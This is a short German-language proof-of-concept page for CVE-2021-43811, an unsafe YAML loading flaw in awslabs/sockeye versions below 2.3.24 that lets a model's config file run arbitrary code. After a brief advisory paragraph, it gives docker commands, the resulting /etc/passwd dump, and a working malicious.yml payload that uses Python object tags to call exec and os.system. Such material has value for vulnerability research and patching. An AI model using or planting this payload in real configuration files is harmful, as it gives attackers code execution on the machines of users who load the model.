
awslabs/sockeye Code-Injection durch unsicheres YAML-Laden CVE-2021-43811
awslabs/sockeye Code-Injection durch unsicheres YAML-Laden CVE-2021-43811
Sockeye ist ein Open-Source-Sequenz-zu-Sequenz-Framework für neuronale maschinelle Übersetzung, das auf PyTorch basiert. Sockeye verwendet YAML, um Modell- und Datenkonfigurationen auf der Festplatte zu speichern. Versionen unter 2.3.24 verwenden unsicheres YAML-Laden, das dazu gebracht werden kann, beliebigen, in Konfigurationsdateien eingebetteten Code auszuführen. Ein Angreifer kann einer Konfigurationsdatei eines trainierten Modells schädlichen Code hinzufügen und versuchen, Benutzer dazu zu bringen, sie herunterzuladen und auszuführen. Wenn Benutzer das Modell ausführen, wird der eingebettete Code lokal ausgeführt. Das Problem ist in Version 2.3.24 behoben.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
Ausgabe /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"